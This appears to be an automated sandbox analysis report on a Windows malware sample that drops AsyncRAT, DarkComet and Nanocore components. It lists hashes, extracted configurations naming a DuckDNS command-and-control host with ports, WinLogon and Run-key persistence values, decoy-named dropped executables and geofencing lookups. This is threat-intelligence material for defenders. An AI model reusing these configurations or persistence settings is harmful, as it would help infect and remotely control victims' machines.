Analysis
-
max time kernel
27s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250410-en -
resource tags
arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system -
submitted
21/04/2025, 19:21
General
-
Target
9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe
-
Size
1018KB
-
MD5
eceb6e1e8aa84e6501589dc1d3deb419
-
SHA1
467a412530d7af26b01ec278d7d325e4b6dd047a
-
SHA256
9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236
-
SHA512
be256564941a092d73b6931dfa0a238b17d68c69e1742b98844e43fa3010db83bf9d52922912e127cd9b6cd1bbf9ecd39c4a36c2da676ca060bf21ffef8b27bf
-
SSDEEP
24576:pji1+TKiRzC0NqgGApfkxIpePcvkTR8cvkTAU:pu1+miRnQjALpe0vkTNvkTN
Malware Config
Extracted
asyncrat
0.5.8
Default
jvjv2044duck33.duckdns.org:8808
0fC8zJGwBBNm
-
delay
3
-
install
true
-
install_file
csrss.exe
-
install_folder
%AppData%
Extracted
darkcomet
Guest16
jvjv2044duck33.duckdns.org:1604
DC_MUTEX-CK7UE3N
-
InstallPath
MSDCSC\msdcsc.exe
-
gencode
Jp74nsvbhc4i
-
install
true
-
offline_keylogger
true
-
persistence
true
-
reg_key
MicroUpdate
Signatures
-
Asyncrat family
-
Darkcomet family
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe" VLC1.EXE -
Nanocore family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x00070000000241d7-114.dat family_asyncrat -
Disables Task Manager via registry modification
-
Sets file to hidden 1 TTPs 5 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2540 attrib.exe 4712 attrib.exe 3696 attrib.exe 2644 attrib.exe 4852 attrib.exe -
Checks computer location settings 2 TTPs 64 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation VLC1.EXE Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Rundll32.exe -
Executes dropped EXE 64 IoCs
pid Process 5604 FILE5.EXE 704 JOKE.EXE 4168 ULTIME MULTIHACK REBORN.EXE 3180 VLC1.EXE 4852 JOKE2.EXE 4488 WINDOWS SECURITY NANO.EXE 4416 WINDOWS DEFENDER.EXE 4444 LEGIT_SOFTWARE1.EXE 4864 LEGIT_SOFTWARE2.EXE 4892 SENDE2R.EXE 2432 Rundll32.exe 3476 Rundll32.exe 4440 msdcsc.exe 1404 msdcsc.exe 4176 Rundll32.exe 5736 Rundll32.exe 3172 msdcsc.exe 4492 Rundll32.exe 3428 Rundll32.exe 3924 Rundll32.exe 5496 Rundll32.exe 5712 Rundll32.exe 4256 Rundll32.exe 4772 Rundll32.exe 4324 Rundll32.exe 5724 Rundll32.exe 3060 Rundll32.exe 4020 Rundll32.exe 2864 Rundll32.exe 5892 Rundll32.exe 3008 Rundll32.exe 2904 Rundll32.exe 2652 Rundll32.exe 4836 Rundll32.exe 4372 Rundll32.exe 3016 Rundll32.exe 4324 Rundll32.exe 4912 Rundll32.exe 5264 Rundll32.exe 832 Rundll32.exe 3144 Rundll32.exe 2304 Rundll32.exe 1076 Rundll32.exe 5880 Rundll32.exe 5724 Rundll32.exe 3992 Rundll32.exe 4276 Rundll32.exe 3656 Rundll32.exe 3924 Rundll32.exe 4792 Rundll32.exe 3768 Rundll32.exe 3564 Rundll32.exe 1820 csrss.exe 5352 Rundll32.exe 5580 Rundll32.exe 1444 Rundll32.exe 312 Rundll32.exe 3228 Rundll32.exe 5884 Rundll32.exe 4772 Rundll32.exe 3556 Rundll32.exe 5368 msdcsc.exe 3968 Rundll32.exe 2396 Rundll32.exe -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\PCI Manager = "C:\\Program Files (x86)\\PCI Manager\\pcimgr.exe" WINDOWS SECURITY NANO.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe" msdcsc.exe Set value (str) \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FindMe = "C:\\Windows\\Temp\\svchost_533423.exe" WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FindMe = "C:\\Users\\Public\\Documents\\winservice_533423.exe" WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe" VLC1.EXE -
Checks whether UAC is enabled 1 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA WINDOWS SECURITY NANO.EXE -
Drops file in System32 directory 64 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe -
resource yara_rule behavioral1/files/0x00070000000241d6-47.dat upx behavioral1/memory/3180-82-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/4440-229-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/1404-226-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/4440-225-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/3180-260-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/3172-304-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/3172-311-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/1404-358-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5368-486-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5368-490-0x0000000000400000-0x00000000004B7000-memory.dmp upx -
Drops file in Program Files directory 7 IoCs
description ioc Process File created C:\Program Files (x86)\ULTIME MULTIHACK REBORN.EXE FILE5.EXE File created C:\Program Files (x86)\VLC1.EXE FILE5.EXE File created C:\Program Files (x86)\WINDOWS DEFENDER.EXE FILE5.EXE File created C:\Program Files (x86)\WINDOWS SECURITY NANO.EXE FILE5.EXE File created C:\Program Files (x86)\PCI Manager\pcimgr.exe WINDOWS SECURITY NANO.EXE File opened for modification C:\Program Files (x86)\PCI Manager\pcimgr.exe WINDOWS SECURITY NANO.EXE File opened for modification C:\Program Files (x86)\VLC1.EXE attrib.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
pid Process 2408 powershell.exe 4908 powershell.exe 3632 powershell.exe 3136 powershell.exe 1448 powershell.exe 4228 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VLC1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msdcsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msdcsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LEGIT_SOFTWARE1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Delays execution with timeout.exe 10 IoCs
pid Process 3100 timeout.exe 3824 timeout.exe 2016 timeout.exe 1700 timeout.exe 3824 timeout.exe 1608 timeout.exe 4804 timeout.exe 4608 timeout.exe 5508 timeout.exe 3112 timeout.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Software\Microsoft\Internet Explorer\Main reg.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Local Settings 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ VLC1.EXE Key created \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Local Settings cmd.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1284 reg.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2280 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4488 WINDOWS SECURITY NANO.EXE 4488 WINDOWS SECURITY NANO.EXE 4488 WINDOWS SECURITY NANO.EXE 4488 WINDOWS SECURITY NANO.EXE 4488 WINDOWS SECURITY NANO.EXE 4488 WINDOWS SECURITY NANO.EXE 4488 WINDOWS SECURITY NANO.EXE 4488 WINDOWS SECURITY NANO.EXE 4908 powershell.exe 4908 powershell.exe 3632 powershell.exe 3632 powershell.exe 4168 ULTIME MULTIHACK REBORN.EXE 4168 ULTIME MULTIHACK REBORN.EXE 4168 ULTIME MULTIHACK REBORN.EXE 4168 ULTIME MULTIHACK REBORN.EXE 4168 ULTIME MULTIHACK REBORN.EXE 4168 ULTIME MULTIHACK REBORN.EXE 4168 ULTIME MULTIHACK REBORN.EXE 4168 ULTIME MULTIHACK REBORN.EXE 4228 powershell.exe 4228 powershell.exe 2408 powershell.exe 2408 powershell.exe 3136 powershell.exe 3136 powershell.exe 1448 powershell.exe 1448 powershell.exe 4168 ULTIME MULTIHACK REBORN.EXE 4168 ULTIME MULTIHACK REBORN.EXE 4168 ULTIME MULTIHACK REBORN.EXE 4168 ULTIME MULTIHACK REBORN.EXE 4168 ULTIME MULTIHACK REBORN.EXE 4168 ULTIME MULTIHACK REBORN.EXE 4168 ULTIME MULTIHACK REBORN.EXE 4168 ULTIME MULTIHACK REBORN.EXE 4168 ULTIME MULTIHACK REBORN.EXE 4908 powershell.exe 3632 powershell.exe 4168 ULTIME MULTIHACK REBORN.EXE 4488 WINDOWS SECURITY NANO.EXE 4488 WINDOWS SECURITY NANO.EXE 4488 WINDOWS SECURITY NANO.EXE 4488 WINDOWS SECURITY NANO.EXE 4168 ULTIME MULTIHACK REBORN.EXE 3136 powershell.exe 4168 ULTIME MULTIHACK REBORN.EXE 4416 WINDOWS DEFENDER.EXE 4416 WINDOWS DEFENDER.EXE 4416 WINDOWS DEFENDER.EXE 4416 WINDOWS DEFENDER.EXE 4416 WINDOWS DEFENDER.EXE 4416 WINDOWS DEFENDER.EXE 4416 WINDOWS DEFENDER.EXE 4416 WINDOWS DEFENDER.EXE 4416 WINDOWS DEFENDER.EXE 4416 WINDOWS DEFENDER.EXE 4416 WINDOWS DEFENDER.EXE 4416 WINDOWS DEFENDER.EXE 4416 WINDOWS DEFENDER.EXE 4416 WINDOWS DEFENDER.EXE 4416 WINDOWS DEFENDER.EXE 4416 WINDOWS DEFENDER.EXE 4416 WINDOWS DEFENDER.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4488 WINDOWS SECURITY NANO.EXE -
